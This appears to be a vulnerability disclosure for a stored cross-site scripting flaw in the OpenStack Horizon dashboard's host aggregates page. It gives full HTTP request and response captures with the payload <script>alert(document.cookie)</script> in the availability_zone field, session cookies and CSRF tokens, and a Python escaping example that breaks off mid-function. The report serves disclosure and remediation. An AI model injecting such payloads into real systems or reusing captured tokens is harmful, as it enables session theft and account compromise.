/admin/aggregates/ is subject to a stored cross-site scripting issue. The impacted parameter is availability_zone.
For example, here is the request for the update:
POST /admin/aggregates/1/update/ HTTP/1.1
Host: 23.253.125.245
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://23.253.125.245/admin/aggregates/
Content-Length: 192
Cookie: csrftoken=I5yG5Rnp4qLdr0hE9EDlspnDtsAljUHK; sessionid=".eJytV1lzG0UQDo5jJ3YuAjEhHDG3wiHNPbvhSgiEACGAyVbpxaWaa7Mi0q5H2nXIw1bBC_-HP8Q7_4KelUQChQ7AerBnZ2e_6e-b7p7un9Zq_1QrOVvlY1McONsriwcuT3axNphTwgQXGGtFIyaUVnFEUiMiitJksxq7Ua9vu7vHjh3TEeWKGMKVwizmaay5xQx-lMeWI-HXku2Ru98v8l6uhu5ucqanqjLrTTGyteTc9LXL7UHRz8vuFYDNyvLgWqdDaJtw2saEtwnj1zhCqHNI2sgfT84BwGHfuHFv8n33FHy21wy_yZ1fTy48sZFWBrjZ5E0gmo9LeGpetqfz7a_co3FZ5O6T6bozAzUue8qU_cN--ejLX2_9_n1yotHH_A0hwG_dC2-2_ImrP_uN2m-2kg1bDFU_9ydrf6qVrPWt37qbrAcB_PbdKjk7tf2mKtWguO9P7_szrdqfbTUkZkKM_bl9f772T7e6J2Fa2WE_T_bu-Avdj-YqFEnJQKGOcpGRPLVpTCVDkdUaE8tTrAnBShDe3QCIiXD-mWy9uwaPYOWzzZnGEY0lFixOGWeWW0WkVQ4pEmOpXKq722F1XrpRrgbBootHYVGgflDpQd8EyJ0jgPTPVap77klFe4N-_mDsL-1312G6fHTg_PPdTRiaYnhQla6Zbo7p8mRYHKqq9i-0MjiKF2v_Uiu70H1hrmGxiEUne-avrphNROWSRQ4zjqWImOIukohyw1KMuTKakuziUuCdZSsqlV3azyaMclc-LEYPssvTp6ocFTlwebnhcqX2u4HLQpHFKiLPoYtjbWKjU2qZYFLzSJmYOh2ZNDJEWZYt8ZnV9l7iJSuBzEQLMXZYDKqhOySgWng0_dxCpBKQ7ZVGtldr_1qQ7aUlvknnqMKoSmPBeapSyqRAEdII0VgJSJ9gpQJVlkPvLF8z43TqsWvDh5ebqA8-DStq_3pD6Y3avxkoXZ6LSeE3h4_UwqhYwPkawRCmilinLMURgQuAaQl8luDuLFkwYxIS1DhQmAzA_Lca8yFtXl1sfkxiMsd8aqlwXHIljGTaOS1TDJdcStI0tRqJheY3uIvMDwtm5p8IGXOo7rvpIdwfqNw4YPF2w-Kd2r8bWFxfdLBx5xC30X8NSCkdQiRCsNgxgmVMGSQeSyS4ImXUAtcj2X3nSGCeDEoLt6RW4yBdkBHy2GFQ7r1GuXbtO0sisika8BxZREog_GBHJiRLtdbMMRUpHklHIiz14oicQi-MyMmaGaGzISIHRWXTYjRUJdiSTa6azKkSWKGGFa49WSU94__qDaFUg2ouNpRBqAoTcwx_IGaxIBYKvRXS8wp7L0_Py0Fmwm38mZ6nITRJziAZbSRjtedBsquLdqSdWdXYuRHKqTnqIMSMUZzGqXLMIBMRzR2WHEdOEJNyUGfVbW6GswYh_tX6GefjoXYx4TaajoCtaNjK2kdLHARI_A8HQUK7SFjDGBfMOqQFtYQ6BMndKh4vcZBV917oICuCzMQ6A0jFyGRuXI7-IbDiRrdrtX9_8XURwaU8TxNiZRQZRA2xLFJSoRiKudRFKbM4bTS5uRA30LmR3LvdW0GYI0KaqXM6qKN_cKZ8Dzqd0SyZjh_206DOB406H9b-o6DO7vwrmVMumxZsjkZEpDiSMTYaWah2kMbGYIpDlnVG6pBPV-jvsp3s-JNXQN-6vIRObFqXPZi2a5VLToyKgRv7j_f9dSgFbkwX9IZuqKHvG9f-E5g6P3WD3qRxKx7mbgSvbk5FaDqrsYNWOPSKk9YNelP_abJpXaqqQek_Szbdjwf9EWx1y8CF5Mr-0G39OfCfJ1ubv53cfu7i001mGheRQLg9_b-VlGbL376657_4Zc9_mWwejIpwEv6r2t9pZVuNcEubma-z7cfWeugi14O5_pvafwsY2dpfXn9XNV3nXrIL
ZVgaM6y1krGwyFqEoC1nUIFCia619N8nG6XLVV76e9mdSlftPwAqQEGv:1XGyHp:Um-2q06zpKC9jj_-kA_gP0kXeAk"; horizon.tabs=%7B%22undefined%22%3A%22%23launch_database__setinstancedetailsaction%22%7D
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
csrfmiddlewaretoken=I5yG5Rnp4qLdr0hE9EDlspnDtsAljUHK&name=invisible_to_admin%3Cscript%3Exss%3C%2Fscript%3E&availability_zone=invisible_to_admin%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E
The response is the following:
HTTP/1.1 200 OK
Date: Mon, 11 Aug 2014 22:42:13 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Horizon-Location: /admin/aggregates/
Vary: Cookie
Set-Cookie: sessionid=".eJy1V1l320QULmmWNqEJdKElLA27C9SeXVJZS9kpLaTVOX7J8ZlNlYktZWwppQ86B174Z_wN3vkX3JHlsKW2ywl-SEYazb33--auPy1V7qlWvFlmY50fWNMr8n2bxTtYacwpYYILjJWkIRNSySgkiRYhRUm8Vo7tqNc33Z1Tp06pkHJJNOFSYhbxJFLcYAY_yiPDkXBL8cbIPujnWS-TQ3snPteTZZH2GhnpUrzVbNvMHOT9rOheBbFpURzc6HQIbRNO25jwNmH8BkcIdQ5JG7nT8RYIOOxrO-5NznfPwrHdenk3s245Pv8XRUpqwGbiNwFoNi7gqd5sN-_b39hH4yLP7CfNd-cGclz0pC76h_3i0de_fv77vXil5kf_Q4IXv37f76y7lWs_u9XKrbXiVZMPZT9zZyp3thUv9Y1bvxMvewLcxp0y3mxsvyULOcgfuKf33LlW5TZb3S0AMSVi3Bv0s_2x29qrsR29ds_suWcrd77VPQOvpRn2s3j3trvQ_fCxxIVBwIC4jrShDnhikogGDIVGKUwMT7AiBEtBeHcVREz4dBfT5VrvQakGfe01XDoBDe657hIIAUYu1_4ThTQKsGBRwjgz3EgSGGmRJBEOpE1Ud8N_nRV2lMmBN-LKCRhRyu4yCCkeHVj3fHcNljofHpSFrV_X17Q9WeaHsqzcC610ay8F2l-s3Eut9EL3hceaEIlIdNKLf_fG9NLcExM2eMBCixnHgQiZ5DYMEOWaJRhzqRUl6ZV5gkqZThBltniYj_bT7eapLEZ5BlhenmK5Wrkdj2UmnWIROo-BewJCJ4zgSOlIq4QaJligeCh1RK0KdRJqIg1L5_jDQrpq0nwwHeaDcmgPCbDmH3U_MxCpBGh7ZUrbq5V7zdP20hwvpMewMv_MBDSjMokE54lMKAsECpFCiEZSQJYFJBJAzxVVYzr7p2uD8O06vL1Pw3blXp9CeqNyb3pI24-VSeF3DJ45ByZgAiW0jATcnRYMYSqJsdJQHBIoEkwFAGa2nBqJTxpjD2GyAPPfmpoPmfPabPMjEpEnMr8-MDGfGiosD7gUOmDKWhUkGAphQpIkMQqJmeZ7ObX5Kz6LDeUD21zCg4HMtAUUb09RvFO5dz2Kj2ddbNQ5xG30XwLyRMQ2FxpYhEiIYNMygoOIMshOhgTgrZRRA4ychLajoDRQJZUce-o8jZDHDj1z16fMtSvXmRORdd-AnywimzMTzCIhEH5gFRMBS5RSzDIZSh4GloQ4ULMjciKqBrTpI3KQlybJR0NZgCHppNSkVhaACk1R4cqRRdIz_j_S8wJCm0wFLR90hZGmDMJZ6Ihj-ANxjQUx0DAukJ7n66qJWz1Kz00ITZIzUEanlLHKcU_ZtVkaaWfaOHZu-tbpGHYWPX_L32NDBEJMa8lplEjLNNIhUdzigOPQCqITDkQ8kdga82nf9mlfjZoVoBVTtEHlwjkOAkadvIMsKrThRSgbCqMZ44IZi5SghlCLoAAYyaM5DrKgrpqscyAmH-nUjovRMYEVTXm7Ubn3ZpeLEAruMZzcmnnA23kzvv9lb1FiiAnCUCOqiWGhDCSKoOlLbJgwg5OamBNSWLPztGdH_WB1cR0mndE0mY4f9hPPzvtTdj6o3IeenZ3Hl2ROeVBPYf_mKD3doCMiwWEQYa2QgW4GKaw1pthnUasD5fPlAmPeUQnoG5sVMIk1fdl-M66VNl4Z5QM7dh_tuY-hD7jZfNAb2qGCuW9cuU_g1TONG_Qmg1v-MLMj2LrVkFCPUGMLo7CfFSejG8ym7tN4zdhEloPCfRav2R8P-iNQ9bmGgmSL_tCuHy3cF_H62m9nNi5ferbOTOM8FAi3m__rcaHX3ZfXdt1Xv-y6r-O1g1Hub8J9U7nbrXS9Zmzu4PRtuvGntQ6myGVvrrtbue9ARrr0t-3vy3rq3I13oMVKIoaVkkEkDDIGIRjLGbSW0ForFbh78WphM5kV
7n56u1Rl-w8FGkG3:1XGyI9:Z4FqhXc2db7HwwtZeSi0DIW8YRQ"; httponly; Path=/
Set-Cookie: messages="3b207814661220efb902165acec019e6a6d9fbc3$[[\"__json_message\"\0540\05425\054\"Successfully updated aggregate: \\\"invisible_to_admin<script>xss</script>.\\\"\"]]"; Path=/
Content-Length: 0
Content-Type: text/html; charset=utf-8
Age: 0
Via: 1.1 540554-SAT6WWSG03.secops.rackspace.com
The GET request looks like:
GET /admin/aggregates/ HTTP/1.1
Host: 23.253.125.245
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://23.253.125.245/admin/aggregates/
Cookie: csrftoken=I5yG5Rnp4qLdr0hE9EDlspnDtsAljUHK; sessionid=".eJy1V1l320QULmmWNqEJdKElLA27C9SeXVJZS9kpLaTVOX7J8ZlNlYktZWwppQ86B174Z_wN3vkX3JHlsKW2ywl-SEYazb33--auPy1V7qlWvFlmY50fWNMr8n2bxTtYacwpYYILjJWkIRNSySgkiRYhRUm8Vo7tqNc33Z1Tp06pkHJJNOFSYhbxJFLcYAY_yiPDkXBL8cbIPujnWS-TQ3snPteTZZH2GhnpUrzVbNvMHOT9rOheBbFpURzc6HQIbRNO25jwNmH8BkcIdQ5JG7nT8RYIOOxrO-5NznfPwrHdenk3s245Pv8XRUpqwGbiNwFoNi7gqd5sN-_b39hH4yLP7CfNd-cGclz0pC76h_3i0de_fv77vXil5kf_Q4IXv37f76y7lWs_u9XKrbXiVZMPZT9zZyp3thUv9Y1bvxMvewLcxp0y3mxsvyULOcgfuKf33LlW5TZb3S0AMSVi3Bv0s_2x29qrsR29ds_suWcrd77VPQOvpRn2s3j3trvQ_fCxxIVBwIC4jrShDnhikogGDIVGKUwMT7AiBEtBeHcVREz4dBfT5VrvQakGfe01XDoBDe657hIIAUYu1_4ThTQKsGBRwjgz3EgSGGmRJBEOpE1Ud8N_nRV2lMmBN-LKCRhRyu4yCCkeHVj3fHcNljofHpSFrV_X17Q9WeaHsqzcC610ay8F2l-s3Eut9EL3hceaEIlIdNKLf_fG9NLcExM2eMBCixnHgQiZ5DYMEOWaJRhzqRUl6ZV5gkqZThBltniYj_bT7eapLEZ5BlhenmK5Wrkdj2UmnWIROo-BewJCJ4zgSOlIq4QaJligeCh1RK0KdRJqIg1L5_jDQrpq0nwwHeaDcmgPCbDmH3U_MxCpBGh7ZUrbq5V7zdP20hwvpMewMv_MBDSjMokE54lMKAsECpFCiEZSQJYFJBJAzxVVYzr7p2uD8O06vL1Pw3blXp9CeqNyb3pI24-VSeF3DJ45ByZgAiW0jATcnRYMYSqJsdJQHBIoEkwFAGa2nBqJTxpjD2GyAPPfmpoPmfPabPMjEpEnMr8-MDGfGiosD7gUOmDKWhUkGAphQpIkMQqJmeZ7ObX5Kz6LDeUD21zCg4HMtAUUb09RvFO5dz2Kj2ddbNQ5xG30XwLyRMQ2FxpYhEiIYNMygoOIMshOhgTgrZRRA4ychLajoDRQJZUce-o8jZDHDj1z16fMtSvXmRORdd-AnywimzMTzCIhEH5gFRMBS5RSzDIZSh4GloQ4ULMjciKqBrTpI3KQlybJR0NZgCHppNSkVhaACk1R4cqRRdIz_j_S8wJCm0wFLR90hZGmDMJZ6Ihj-ANxjQUx0DAukJ7n66qJWz1Kz00ITZIzUEanlLHKcU_ZtVkaaWfaOHZu-tbpGHYWPX_L32NDBEJMa8lplEjLNNIhUdzigOPQCqITDkQ8kdga82nf9mlfjZoVoBVTtEHlwjkOAkadvIMsKrThRSgbCqMZ44IZi5SghlCLoAAYyaM5DrKgrpqscyAmH-nUjovRMYEVTXm7Ubn3ZpeLEAruMZzcmnnA23kzvv9lb1FiiAnCUCOqiWGhDCSKoOlLbJgwg5OamBNSWLPztGdH_WB1cR0mndE0mY4f9hPPzvtTdj6o3IeenZ3Hl2ROeVBPYf_mKD3doCMiwWEQYa2QgW4GKaw1pthnUasD5fPlAmPeUQnoG5sVMIk1fdl-M66VNl4Z5QM7dh_tuY-hD7jZfNAb2qGCuW9cuU_g1TONG_Qmg1v-MLMj2LrVkFCPUGMLo7CfFSejG8ym7tN4zdhEloPCfRav2R8P-iNQ9bmGgmSL_tCuHy3cF_H62m9nNi5ferbOTOM8FAi3m__rcaHX3ZfXdt1Xv-y6r-O1g1Hub8J9U7nbrXS9Zmzu4PRtuvGntQ6myGVvrrtbue9ARrr0t-3vy3rq3I13
oMVKIoaVkkEkDDIGIRjLGbSW0ForFbh78WphM5kV7n56u1Rl-w8FGkG3:1XGyI9:Z4FqhXc2db7HwwtZeSi0DIW8YRQ"; horizon.tabs=%7B%22undefined%22%3A%22%23launch_database__setinstancedetailsaction%22%7D; messages="3b207814661220efb902165acec019e6a6d9fbc3$[[\"__json_message\"\0540\05425\054\"Successfully updated aggregate: \\\"invisible_to_admin<script>xss</script>.\\\"\"]]"
Connection: keep-alive
And the response contains the injected XSS payload:
HTTP/1.1 200 OK
Date: Mon, 11 Aug 2014 22:42:14 GMT
Server: Apache/2.4.7 (Ubuntu)
Vary: Accept-Language,Cookie,Accept-Encoding
X-Frame-Options: SAMEORIGIN
Content-Language: en
Set-Cookie: csrftoken=I5yG5Rnp4qLdr0hE9EDlspnDtsAljUHK; expires=Mon, 10-Aug-2015 22:42:14 GMT; Max-Age=31449600; Path=/
Set-Cookie: sessionid=".eJy1V1tz20QULmkubUIbWiiXQGm4FQeovXdJBUpLuBQoBUI145eMZ2-qTG0pa0spfdAMvPDT-Bm88y84K8u0MIntMsEPyUqrPed8357rL0uVe6YVny-zsc4PrOkV-QObxdtYacwpYYILjJWkIRNSySgkiRYhRUm8Vo7tqNc33e1Tp06pkHJJNOFSYhbxJFLcYAY_yiPDkXBL8cbI3u_nWS-TQ3s3PteTZZH2GhnpUrzZbNvMHOT9rOheAbFpURxc73QIbRNO25jwNmH8OkcIdQ5JG7nT8SYIOOxrO-5NznfPwrG9evldZt1yfPEJRUpqwGbiqwA0GxfwVG-2m_ftb-yjcZFn9tPmu3MDOS56Uhf9w37x6Ovfv_jzx3il5kf_S4IXv37P76y7lZ1f3Wrl1lrxqsmHsp-5M5U724qX-sat342XPQFu424Zn29s35WFHOT33bP77lyrcudbNYgpEWO3ue-eq9yFVvcMvJZm2M_ivTvuYvfGsQyFQcCAoY60oQ54YpKIBgyFRilMDE-wIgRLQXh3FURMiHPPp8vdDXgElXaUyYHX8cJJ6FjyQo27VDtKFNIowIJFCePMcCNJYKRFkkQ4kDZRNfSDUg362hvw4gkY4F4qZXfzSUZ7g372YOxe3u8uw-vi0YF1r3TXYKnz4UFZ2Pp1fU1bk2V-KMvKvdpK4Speq9zlVnqx--qxhkUiEp30-X-6YvrC3BMThnjAQosZx4EImeQ2DBDlmiUYc6kVJemL8wSVMn15P50gymzxMB89SLeap7IY5Rlgeb3GcqVy2x7LTJLFIiQfAfcEhE4YwZHSkVYJNUywQPFQ6ohaFeok1EQals7xkoV0TUnzMXaYD8qhPSTAmn_U_cxApBKg7Y2atjcr95an7fIc36RHsDL_zAQ0ozKJBOeJTCgLBAqRQohGUkCKBSQSQM8VNcV09rFrg_ytOuq9T8MXlXu7hvRO5a56SFvHyqTwOwLPnAMTMIESWkYC7k4LhjCVxFhpKA4JVAimAgAzW84Uic8lYw9hsgDz363Nh7S5M9v8iETkqcyvD0zMp4YKywMuhQ6YslYFCYYqmJAkSYxCYqb5Xs7U_BWfCofyvm0u4f5AZtoCivdqFO9X7gOP4uasi406h7iN_ktAnojY5kIDixAJEWxaRnAQUQbZyZAAvJUyaoCRk9D2ZFAaqJJKjj11nkbIY4eeuWs1c-3KdeZEZN004KeLyObMBLNICIQfWMVEwBKlFLNMhpKHgSUhDtTsiJyImgI67yNykJcmyUdDWYAt6aTUpFYWgArVqHDlyCLpGf8f6XkBoU2mgn4PWsJIUwbhLHTEMfyBuMaCGOgWF0jP83VNiVv9Oz03ITRJzkAZrSljleOesp1ZGmln2jV2bvl26gh2Fj2_6y-xIQIhprXkNEqkZRrpkChuccBxaAXRCQcinkrsFPNp37toX42aFaAVNdqgcuEcBwGjTt5BFhXa8CKUDYXRjHHBjEVKUEOoRVAAjOTRHAdZUNeUrHMgKR_p1I6L0RGBFdW8Xa_ch7PLRQgF9whOdmce8Hbeiu_d7i1KDDFBGGpENTEslIFEETR9iQ0TZnBSE3NCCqfsPOvZUT9ZXVyDSWc0Tabjh_3Es_NRzc7Hlbvh2dk-viRzyoN6BDuCowUGtwY_EQkOgwhrhQz0O0hhrTHFPs9aHSjIqOnpJ0tA39isgEms6cseNONaaeOVUT6wY_fJvrsJrcCt5oPe0A4VzH3jyn0Kr55r3KA3Gdzyh5kdwdZuQ0I9WY0tjMJ-VpyMbjCbus_iNWMTWQ4K93m8Zn8-6I9A1RcaCpIt-kO7_vfCfRmvr_1xZuOlSxfqzDTOQ4Fwu_m_Hhd63d3e2XNf_bbnvo7XDka5vwn3TeXutNL1mpK5w8y36cZjax1MkcveXPdd5b4HGenSP7Z_KOupcy_ehi4riRhWSgaRMMgYhGAsZ9BdQnetVOB-jFcLm8ms
cPfSO6Uq238BBl5BxA:1XGyIA:-6Qt3ZZ7PkdNVpPYJOElOMzR-9k"; httponly; Path=/
Set-Cookie: messages=; expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
Content-Type: text/html; charset=utf-8
Content-Length: 14400
Age: 0
Via: 1.1 540554-SAT6WWSG03.secops.rackspace.com
<!DOCTYPE html>
<html>
<head>
<meta content='text/html; charset=utf-8' http-equiv='Content-Type' />
<title>Host Aggregates - OpenStack Dashboard</title>
<link rel="stylesheet" href="/static/dashboard/css/6bf08293a8e0.css" type="text/css" media="screen" />
<link rel="shortcut icon" href="/static/dashboard/img/favicon.ico"/>
<script type="text/javascript" src="/static/dashboard/js/0272dc9e5c21.js"></script>
<script type="text/javascript" charset="utf-8">
/*
Added so that we can append Horizon scoped JS events to
the DOM load events without running in to the "horizon"
name-space not currently being defined since we load the
scripts at the bottom of the page.
*/
var addHorizonLoadEvent = function(func) {
var old_onload = window.onload;
if (typeof window.onload != 'function') {
window.onload = func;
} else {
window.onload = function() {
old_onload();
func();
}
}
}
</script>
</head>
<body id="" ng-app='hz'>
<div id="container">
<div class='topbar'>
<h1 class="brand"><a href="/home/">OpenStack Dashboard</a></h1>
<div class="context-box">
<div id="tenant_switcher" class="dropdown switcher_bar" tabindex="1">
<a class="dropdown-toggle" data-toggle="dropdown" href="#tenant_switcher">
<h3>admin</h3>
</a>
<ul id="tenant_list" class="dropdown-menu">
<li class='divider'></li>
<li><a href="/auth/switch/9b2a33fc33134aae97f530bd9b2da86d/?next=/admin/">demo</a></li>
</ul>
</div>
</div>
<div id="user_info" class="pull-right">
<div id="profile_editor_switcher" class="dropdown switcher_bar" tabindex='1'>
<a class="dropdown-toggle" data-toggle="dropdown" href="#profile_editor_switcher">
<div>admin</div>
</a>
<ul id="editor_list" class="dropdown-menu">
<li class='divider'></li>
<li><a href="/settings/">Settings</a></li>
<li><a href="http://docs.openstack.org" target="_new">Help</a></li>
</ul>
</div>
<a href="/auth/logout/">Sign Out</a>
</div>
</div>
<div id='main_content'>
<div class="messages">
<div class="alert alert-block alert-success fade in">
<a class="close" data-dismiss="alert" href="#">×</a>
<p><strong>Success: </strong>Successfully updated aggregate: "invisible_to_admin<script>xss</script>."</p>
</div>
</div>
<div class='sidebar'>
<div>
<dl class="nav_accordion">
<dt >
<div>Project</div>
</dt>
<dd style="display:none;">
<div><h4><div>Compute</div></h4>
<ul>
<li><a href="/project/" >Overview</a></li>
<li><a href="/project/instances/" >Instances</a></li>
<li><a href="/project/volumes/" >Volumes</a></li>
<li><a href="/project/images/" >Images</a></li>
<li><a href="/project/access_and_security/" >Access & Security</a></li>
</ul>
</div>
<div><h4><div>Network</div></h4>
<ul>
<li><a href="/project/network_topology/" >Network Topology</a></li>
<li><a href="/project/networks/" >Networks</a></li>
<li><a href="/project/routers/" >Routers</a></li>
<li><a href="/project/loadbalancers/" >Load Balancers</a></li>
</ul>
</div>
<div><h4><div>Object Store</div></h4>
<ul>
<li><a href="/project/containers/" >Containers</a></li>
</ul>
</div>
<div><h4><div>Orchestration</div></h4>
<ul>
<li><a href="/project/stacks/" >Stacks</a></li>
</ul>
</div>
<div><h4><div>Databases</div></h4>
<ul>
<li><a href="/project/databases/" >Database Instances</a></li>
<li><a href="/project/database_backups/" >Database Backups</a></li>
</ul>
</div>
</dd>
<dt class="active">
<div>Admin</div>
</dt>
<dd>
<div><h4><div>System Panel</div></h4>
<ul>
<li><a href="/admin/" >Overview</a></li>
<li><a href="/admin/hypervisors/" >Hypervisors</a></li>
<li><a href="/admin/aggregates/" class="active" >Host Aggregates</a></li>
<li><a href="/admin/instances/" >Instances</a></li>
<li><a href="/admin/volumes/" >Volumes</a></li>
<li><a href="/admin/flavors/" >Flavors</a></li>
<li><a href="/admin/images/images/" >Images</a></li>
<li><a href="/admin/networks/" >Networks</a></li>
<li><a href="/admin/routers/" >Routers</a></li>
<li><a href="/admin/info/" >System Info</a></li>
</ul>
</div>
<div><h4><div>Identity Panel</div></h4>
<ul>
<li><a href="/admin/projects/" >Projects</a></li>
<li><a href="/admin/users/" >Users</a></li>
</ul>
</div>
</dd>
</dl>
</div>
</div>
<div id='content_body'>
<div class='page-header'>
<h2>Host Aggregates</h2>
</div>
<div id="host-aggregates">
<div class="table_wrapper">
<form action="/admin/aggregates/" method="POST"><input type='hidden' name='csrfmiddlewaretoken' value='I5yG5Rnp4qLdr0hE9EDlspnDtsAljUHK' />
<table id="host_aggregates" class="table table-bordered table-striped datatable">
<thead>
<tr class='table_caption'>
<th class='table_header' colspan='6'>
<h3 class='table_title'>Host Aggregates</h3>
<div class="table_actions clearfix">
<div class="table_search client">
<input class="span3 example" value="" type="text" name="host_aggregates__filter__q" />
<button type="submit" class="btn btn-small btn-search" id="host_aggregates__action_filter">Filter</button>
</div>
<a href='/admin/aggregates/create/' title='Create Host Aggregate' class="btn btn-small ajax-modal btn-create" id="host_aggregates__action_create">Create Host Aggregate</a>
<button class="btn btn-small btn-danger btn-delete" id="host_aggregates__action_delete" name="action" value="host_aggregates__delete" type="submit">Delete Host Aggregates</button>
</div>
</th>
</tr>
<tr>
<th class="multi_select_column"></th>
<th class="sortable normal_column">Name</th>
<th class="sortable normal_column">Availability Zone</th>
<th class="sortable normal_column">Hosts</th>
<th class="sortable normal_column">Metadata</th>
<th class="actions_column">Actions</th>
</tr>
</thead>
<tbody>
<tr class="" data-display="invisible_to_admin<script>xss</script>" data-object-id="1" id="host_aggregates__row__1">
<td class="multi_select_column"><input class="table-row-multi-select" name="object_ids" type="checkbox" value="1" /></td><td class="sortable normal_column">invisible_to_admin<script>xss</script></td><td class="sortable normal_column">invisible_to_admin<script>alert(document.cookie)</script></td><td class="sortable normal_column"></td><td class="sortable normal_column"><li>availability_zone = invisible_to_admin<script>alert(document.cookie)</script></li></td><td class="actions_column"><div class="btn-group"><a href='/admin/aggregates/1/update/' class="btn btn-small ajax-modal btn-edit" id="host_aggregates__row_1__action_update">Edit Host Aggregate</a><a class="btn btn-small dropdown-toggle" data-toggle="dropdown" href="#">
More
<span class="caret"></span></a><ul class="dropdown-menu row_actions clearfix"><li class="clearfix"><a href='/admin/aggregates/1/manage_hosts/' class="btn btn-small ajax-modal btn-create" id="host_aggregates__row_1__action_manage">Manage Hosts</a></li><li class="clearfix"><button class="btn btn-small btn-danger btn-delete" id="host_aggregates__row_1__action_delete" name="action" value="host_aggregates__delete__1" type="submit">Delete Host Aggregate</button></li></ul></div></td>
</tr>
</tbody>
<tfoot>
<tr>
<td colspan="6">
<span class="table_count">Displaying 1 item</span>
</td>
</tr>
</tfoot>
</table>
</form>
</div>
</div>
<div id="availability-zones">
<div class="table_wrapper">
<form action="/admin/aggregates/" method="POST"><input type='hidden' name='csrfmiddlewaretoken' value='I5yG5Rnp4qLdr0hE9EDlspnDtsAljUHK' />
<table id="availability_zones" class="table table-bordered table-striped datatable">
<thead>
<tr class='table_caption'>
<th class='table_header' colspan='3'>
<h3 class='table_title'>Availability Zones</h3>
<div class="table_actions clearfix">
<div class="table_search client">
<input class="span3 example" value="" type="text" name="availability_zones__filter__q" />
<button type="submit" class="btn btn-small btn-search" id="availability_zones__action_filter">Filter</button>
</div>
</div>
</th>
</tr>
<tr>
<th class="sortable normal_column">Availability Zone Name</th>
<th class="sortable normal_column">Hosts</th>
<th class="sortable normal_column">Available</th>
</tr>
</thead>
<tbody>
<tr class="" data-object-id="internal" id="availability_zones__row__internal">
<td class="sortable normal_column">internal</td><td class="sortable normal_column"><li>mxindevstack2 (Services Up)</li></td><td class="status_up sortable normal_column">Yes</td>
</tr>
<tr class="" data-object-id="nova" id="availability_zones__row__nova">
<td class="sortable normal_column">nova</td><td class="sortable normal_column"><li>mxindevstack2 (Services Up)</li></td><td class="status_up sortable normal_column">Yes</td>
</tr>
</tbody>
<tfoot>
<tr>
<td colspan="3">
<span class="table_count">Displaying 2 items</span>
</td>
</tr>
</tfoot>
</table>
</form>
</div>
</div>
</div>
</div>
</div>
<div id="footer">
</div>
<script type="text/javascript" src="/i18n/js/horizon/"></script>
<script type="text/javascript" src="/static/dashboard/js/b28ee7422312.js"></script>
<script type="text/html" id="modal_template">
<div class="modal hide">
<div class='modal-header'>
<a class='close' data-dismiss='modal'>×</a>
<h3>{{title}}</h3>
</div>
<div class='modal-body'>
{{body}}
</div>
<div class='modal-footer'>
<a href='#' class='btn btn-primary'>{{confirm}}</a>
<a href='#' class='btn cancel' data-dismiss='modal'>{{cancel}}</a>
</div>
</div>
</script>
<script type="text/html" id="empty_row_template">
<tr class="odd empty"><td colspan="{{colspan}}">{{no_items_label}}</td></tr>
</script>
<script type="text/html" id="alert_message_template">
<div class="alert alert-block fade in alert-{{type}}">
<a class="close" data-dismiss="alert" href="#">×</a>
<p>
<strong>{{type_display}}</strong>
{{#safe}}
{{{message}}}
{{/safe}}
{{^safe}}
{{message}}
{{/safe}}
</p>
</div>
</script>
<script type="text/html" id="spinner-modal">
<div class="modal loading hide">
<p>{{text}}…</p>
</div>
</script>
<script type="text/html" id="membership_template">
<ul class="nav nav-pills btn-group">
<li class="member" data-{{step_slug}}-id="{{data_id}}">
<span class="display_name">{{display_name}}</span>
</li>
<li class="active"><a class="btn btn-primary" href="#add_remove">{{text}}</a></li>
<li class="dropdown role_options">
<a class="dropdown-toggle" data-toggle="dropdown" href="#">
<span class="roles_display">{{roles_label}}</span>
<b class="caret"></b>
</a>
<ul class="dropdown-menu role_dropdown clearfix">
{{#roles}}
<li data-role-id="{{role_id}}"><i class="icon-ok"></i> {{role_name}}</li>
{{/roles}}
</ul>
</li>
</ul>
</script>
<script type='text/javascript' charset='utf-8'>
// Call init on DOM ready.
$(document).ready(horizon.init);
</script>
<div id="modal_wrapper" />
</body>
</html>
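The response above shows the submitted values reaching three output contexts without escaping: the success banner text, the Name and Availability Zone table cells, and the double-quoted data-display attribute on the table row. The following Python example is added here to illustrate the point; it is not Horizon's code. It reproduces a row in the observed unescaped form, renders the same values with the standard library's html.escape (the equivalent of what Django's template autoescaping does for variables rendered in templates, which is bypassed when a value is marked safe or concatenated into HTML by hand), and includes a small regression check that flags a user-supplied value surviving verbatim in the output. The function names, the simplified row markup and the sample values are constructed for this example.

```python
"""Escaping user-controlled aggregate fields before they reach HTML.

Added example, not Horizon's code. It models the three output contexts
visible in the host aggregates response (success banner text, table cell
text, and the data-display attribute) and shows the same values rendered
with context-appropriate escaping.
"""
from html import escape

# Constructed sample values: the same payloads the report submitted.
AGGREGATE_NAME = 'invisible_to_admin<script>xss</script>'
AVAILABILITY_ZONE = 'invisible_to_admin<script>alert(document.cookie)</script>'


def render_row_unescaped(name, zone, object_id=1):
    """Reproduce the unescaped rendering seen in the response: raw values
    land in the data-display attribute and in two table cells (simplified
    markup, constructed for this example)."""
    return (
        f'<tr data-display="{name}" data-object-id="{object_id}">'
        f'<td>{name}</td><td>{zone}</td></tr>'
    )


def render_row_escaped(name, zone, object_id=1):
    """Same row with html.escape(quote=True). That call covers the text-node
    context (<, >, &) and the double-quoted attribute context (") in one go,
    and the numeric id is coerced so it cannot carry markup either."""
    safe_name = escape(name, quote=True)
    safe_zone = escape(zone, quote=True)
    return (
        f'<tr data-display="{safe_name}" data-object-id="{int(object_id)}">'
        f'<td>{safe_name}</td><td>{safe_zone}</td></tr>'
    )


def render_message_escaped(name):
    """The success banner: escape the interpolated value, not the finished
    message, so the surrounding <strong> stays markup while the value is inert."""
    return (
        '<p><strong>Success: </strong>Successfully updated aggregate: '
        f'"{escape(name, quote=True)}."</p>'
    )


def payload_rendered_raw(markup, value):
    """Regression check for a rendered fragment: True when a user-supplied
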